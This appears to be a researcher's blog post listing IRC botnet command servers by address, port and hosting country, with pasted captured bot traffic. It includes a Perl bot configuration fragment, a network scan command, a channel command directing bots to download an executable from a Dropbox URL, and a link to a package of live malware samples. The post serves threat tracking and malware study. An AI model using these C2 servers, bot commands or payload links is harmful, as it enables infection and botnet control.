ircb.iranserv.com(irc botnet hosted in Belgium Brussels Telenet N.v)

Finally first belgian hecker from Iran Remote Host Port Number 212.123.29.57 8080 NICK IC79467772 USER root 8 * : some name PONG :E1B2C2E5 JOIN #iseee PRIVMSG #iseee :&userid=COMPUTERNAME PONG :ircb.iranserv.com Telenet claim to be one of the best ISP in Belgium and this botnet is hosted in Telenet Network This is more funny: remarks: trouble:

213.58.198.106(irc botnet hosted in Portugal Lisbon Onitelecom – Infocomunicacoes S.a)

Remote Host Port Number 213.58.198.106 7107 NICK new[iRooT-XP-USA]694514 USER 4318 “” “TsGh” :4318 JOIN #!MSN! Coded PONG :irc.foonet.com NICK new[iRooT-XP-USA]389985 MODE #!Reklam! PRIVMSG #!Reklam! : OnLine… NICK DeliCocuk USER bruce “mIRC” “kayits.byinter.net” :KendiniBilmeZ JOIN #!Reklam! sikimiye MODE DeliCocuk +i USER 4207 “” “TsGh” :4207 JOIN #!MSN! Coded PRIVMSG #!MSN! :[Download]: Executed Successfully NICK anil USER

irc.unix-ccpower.com(linux bots hosted in United Kingdom Synergyworks Internet)

$servidor=’irc.unix-ccpower.com’ unless $servidor; my $porta=’7150′; my @adms=(“byz9991”); my @canais=(“#bot”); Resolved : [irc.unix-ccpower.com] To [64.186.152.41] Resolved : [irc.unix-ccpower.com] To [195.74.52.39] Resolved : [irc.unix-ccpower.com] To [200.75.12.211] hosting infos: http://whois.domaintools.com/195.74.52.39

irc.ircatt.info(Gbot variant hosted in Germany Intergenia Ag)

Remote Host Port Number 188.138.89.21 2444 gBot gBot NICK n{USA|XP}lnatesd USER n{USA|XP}lnatesd 0 0 :n{USA|XP}lnatesd JOIN #Peach mychankey PRIVMSG #Peach :[FileProt]: File protection has been enabled for C:WINDOWSsystem32Windefend.exe Now talking in #Peach Topic On: [ #Peach ] [ .prot http://dl.dropbox.com/u/24455252/bins/java.exe] Topic By: [ Atthackers ] {ARE|W7}ywdxoqh) [FileProt]: File protection already enabled for C:WindowsSystem32Windefend.exe with http://dl.dropbox.com/u/24455252/bins/java.exe

92.243.19.35(irc botnet hosted in France Gandi)

Remote Host Port Number 92.243.19.35 1337 NICK [nLh-VNC]eftvsr USER hdadboweq “fo8.net” “rage” :hdadboweq JOIN #VnC# PRIVMSG #VnC# : [RAGE SCAN:] range: 97.x.x.x/94 threads. PONG irc.priv8net.com hosting infos: http://whois.domaintools.com/92.243.19.35

37mb malware samples

Worms,bankers,irc bots inside this package have fun reversing them Download: http://adf.ly/1sSG7

88.86.113.239(irc botnet hosted in Czech Republic Liberec Supernetwork S.r.o)

Remote Host Port Number 88.86.113.239 31092 NICK US|computername USER siruyuse UNIX UNIX :username JOIN #global# JOIN #US Now talking in #global# Topic On: [ #global# ] [ omtECZWQgee3/7w9aGStOwmHmYQVTJXFx68dXRhkVWUhNomgeVieycdUnnRaoait ] Modes On: [ #global# ] [ +smntMu ] hosting infos: http://whois.domaintools.com/88.86.113.239